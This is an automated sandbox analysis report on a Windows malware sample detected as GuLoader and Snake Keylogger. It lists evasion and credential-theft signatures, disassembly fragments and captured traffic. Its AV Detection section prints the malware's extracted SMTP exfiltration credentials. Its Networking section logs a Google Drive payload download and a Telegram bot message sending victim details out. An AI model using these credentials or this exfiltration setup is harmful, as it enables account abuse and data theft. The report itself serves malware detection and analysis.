Windows Analysis Report
NDQ211216GM08.exe.bin.exe

Overview

General Information

Sample name: NDQ211216GM08.exe.bin.exe
Analysis ID: 1637274
MD5: cfdb222e894ea0d5fe9557aae2e0adf3
SHA1: cc01954d759cce12e827be5b1443d5702ebc779d
SHA256: d7798f6bb9a86bb1f5c9d5633015951425439cad729cc2411ff092ae654620be
Tags: exe, user-TornadoAV_dev

Detection

GuLoader, Snake Keylogger
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Early bird code injection technique detected
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected Snake Keylogger
Yara detected Telegram RAT
Found suspicious powershell code related to unpacking or dynamic code loading
Hides threads from debuggers
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Powershell drops PE file
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality to read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Blogpost URLs: none listed
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Name: 404 Keylogger, Snake Keylogger
Description: Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.
Attribution: No Attribution
Blogpost URLs: none listed
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

AV Detection

Source: NDQ211216GM08.exe.bin.exe Avira: detected
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Avira: detection malicious, Label: TR/Injector.wdfal
Source: 0000000B.00000002.2269171713.0000000020251000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "vicente@bodegasvicenteribera.es", "Password": "Vic123456**", "Host": "smtp.ionos.es", "Port": "587", "Version": "4.4"}
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe ReversingLabs: Detection: 63%
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Virustotal: Detection: 63% Perma Link
Source: NDQ211216GM08.exe.bin.exe Virustotal: Detection: 63% Perma Link
Source: NDQ211216GM08.exe.bin.exe ReversingLabs: Detection: 63%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability

Location Tracking

Source: unknown DNS query: name: reallyfreegeoip.org
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_234187A8 CryptUnprotectData, 11_2_234187A8
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_23418EF1 CryptUnprotectData, 11_2_23418EF1
Source: NDQ211216GM08.exe.bin.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.9:49696 version: TLS 1.0
Source: unknown HTTPS traffic detected: 142.250.74.206:443 -> 192.168.2.9:49693 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.186.129:443 -> 192.168.2.9:49694 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49713 version: TLS 1.2
Source: NDQ211216GM08.exe.bin.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe Code function: 0_2_00405C13 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_00405C13
Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe Code function: 0_2_0040683D FindFirstFileW,FindClose, 0_2_0040683D
Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe Code function: 0_2_0040290B FindFirstFileW, 0_2_0040290B
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_0040290B FindFirstFileW, 11_2_0040290B
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_00405C13 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 11_2_00405C13
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_0040683D FindFirstFileW,FindClose, 11_2_0040683D
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 0015F45Dh 11_2_0015F2C0
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 0015F45Dh 11_2_0015F4AC
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 0015FC19h 11_2_0015F974
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 22413308h 11_2_22412EF0
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 22412D41h 11_2_22412A90
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 2241EA79h 11_2_2241E7D0
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 2241D919h 11_2_2241D670
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 2241D4C1h 11_2_2241D218
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 22413308h 11_2_22413236
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 2241DD71h 11_2_2241DAC8
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 22413308h 11_2_22412EEA
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 2241E621h 11_2_2241E378
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 2241E1C9h 11_2_2241DF20
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 22410D0Dh 11_2_22410B30
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 224116F8h 11_2_22410B30
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 11_2_22410040
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 2241EED1h 11_2_2241EC28
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 2241F781h 11_2_2241F4D8
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 2241F329h 11_2_2241F080
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 2241FBD9h 11_2_2241F930
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 2241D069h 11_2_2241CDC0
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 23417EB5h 11_2_23417B78
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 23419280h 11_2_23418FB0
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 2341DEFFh 11_2_2341DC30
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 23415179h 11_2_23414ED0
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 23410FF1h 11_2_23410D48
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 2341E81Fh 11_2_2341E550
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 23412A01h 11_2_23412758
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 2341C82Fh 11_2_2341C560
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 2341A83Fh 11_2_2341A570
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 234125A9h 11_2_23412300
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 2341F5CFh 11_2_2341F300
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 2341D5DFh 11_2_2341D310
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 234179C9h 11_2_23417720
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 2341B5EFh 11_2_2341B320
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 234155D1h 11_2_23415328
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 23419A8Fh 11_2_234197C0
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 23415E81h 11_2_23415BD8
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 2341ECAFh 11_2_2341E9E0
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 2341CCBFh 11_2_2341C9F0
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 234118A1h 11_2_234115F8
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 23415A29h 11_2_23415780
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 2341FA5Fh 11_2_2341F790
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 2341DA6Fh 11_2_2341D7A0
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 23411449h 11_2_234111A0
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 2341BA7Fh 11_2_2341B7B0
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 23412E59h 11_2_23412BB0
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 234102E9h 11_2_23410040
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 2341BF0Fh 11_2_2341BC40
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 23411CF9h 11_2_23411A50
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 23419F1Fh 11_2_23419C50
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 23413709h 11_2_23413460
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 23417119h 11_2_23416E70
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 2341F13Fh 11_2_2341EE70
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 23414D21h 11_2_23414A78
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 2341ACCFh 11_2_2341AA00
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 234132B1h 11_2_23413008
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 23416CC1h 11_2_23416A18
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 234148C9h 11_2_23414620
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 234162D9h 11_2_23416030
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 2341E38Fh 11_2_2341E0C0
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 23417571h 11_2_234172C8
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 2341C39Fh 11_2_2341C0D0
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 2341A3AFh 11_2_2341A0E0
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 23410B99h 11_2_234108F0
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 2341D14Fh 11_2_2341CE80
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 23416733h 11_2_23416488
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 2341B15Fh 11_2_2341AE90
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 23410741h 11_2_23410498
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 23412151h 11_2_23411EA8
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 234847E8h 11_2_23484478
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 23489B10h 11_2_23489818
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 2348F5E8h 11_2_2348F2F0
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 23484E90h 11_2_23484B98
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 23481517h 11_2_23481248
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 23486B40h 11_2_23486848
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 234802E7h 11_2_23480040
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 2348D938h 11_2_2348D640
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 23483E27h 11_2_23483B58
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 2348C150h 11_2_2348BE58
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 23489648h 11_2_23489350
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 23481E37h 11_2_23481B68
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 23487E60h 11_2_23487B68
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 23485358h 11_2_23485060
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 2348EC59h 11_2_2348E960
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 2348D470h 11_2_2348D178
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 2348A968h 11_2_2348A670
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 2348DE00h 11_2_2348DB08
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 2348B2F8h 11_2_2348B000
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 23482BE7h 11_2_23482918
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 23487008h 11_2_23486D10
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 23480BF7h 11_2_23480928
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 23485820h 11_2_23485528
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 2348F120h 11_2_2348EE28
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 2348C618h 11_2_2348C320
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 23483507h 11_2_23483238
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 2348AE30h 11_2_2348AB38
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 23488328h 11_2_23488030
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 23483997h 11_2_234836C8
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 2348B7C0h 11_2_2348B4C8
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 23488CB8h 11_2_234889C0
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 234819A7h 11_2_234816D8
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 234874D0h 11_2_234871D8
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 2348E2C8h 11_2_2348DFD0
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 234842B7h 11_2_23483FE8
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 2348CAE0h 11_2_2348C7E8
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 23489FD8h 11_2_23489CE0
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 234822C7h 11_2_23481FF8
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 234887F0h 11_2_234884F8
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 23485CE8h 11_2_234859F0
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 23482757h 11_2_23482488
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 23489180h 11_2_23488E88
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 23486678h 11_2_23486380
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 23480767h 11_2_23480498
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 2348E790h 11_2_2348E498
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 2348BC88h 11_2_2348B990
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 23483078h 11_2_23482DA8
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 2348A4A0h 11_2_2348A1A8
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 23487998h 11_2_234876A0
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 23481087h 11_2_23480DB8
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 234861B0h 11_2_23485EB8
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 2348FAB0h 11_2_2348F7B8
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 2348CFA8h 11_2_2348CCB0
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then lea esp, dword ptr [ebp-04h] 11_2_234AF1CB
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then lea esp, dword ptr [ebp-04h] 11_2_234AF1C7
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then lea esp, dword ptr [ebp-04h] 11_2_234AF1BF
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then lea esp, dword ptr [ebp-04h] 11_2_234AF1BD
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then lea esp, dword ptr [ebp-04h] 11_2_234AF228
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 234B0800h 11_2_234B0508
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then jmp 234B0338h 11_2_234B0040
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 4x nop then lea esp, dword ptr [ebp-04h] 11_2_234E2A80

Networking

Source: Network traffic Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.9:49713 -> 149.154.167.220:443
Source: unknown DNS query: name: api.telegram.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:367706%0D%0ADate%20and%20Time:%2014/03/2025%20/%2011:48:52%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20367706%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: Joe Sandbox View IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View IP Address: 193.122.130.0 193.122.130.0
Source: Joe Sandbox View IP Address: 104.21.80.1 104.21.80.1
Source: Joe Sandbox View IP Address: 104.21.80.1 104.21.80.1
Source: Joe Sandbox View JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknown DNS query: name: checkip.dyndns.org
Source: unknown DNS query: name: reallyfreegeoip.org
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49699 -> 193.122.130.0:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49695 -> 193.122.130.0:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49698 -> 104.21.80.1:443
Source: Network traffic Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49693 -> 142.250.74.206:443
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1i4eTgLwUk9hJ78wr8LAtfXWd1f7g1Q0D HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /download?id=1i4eTgLwUk9hJ78wr8LAtfXWd1f7g1Q0D&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: unknown HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.9:49696 version: TLS 1.0
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1i4eTgLwUk9hJ78wr8LAtfXWd1f7g1Q0D HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /download?id=1i4eTgLwUk9hJ78wr8LAtfXWd1f7g1Q0D&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
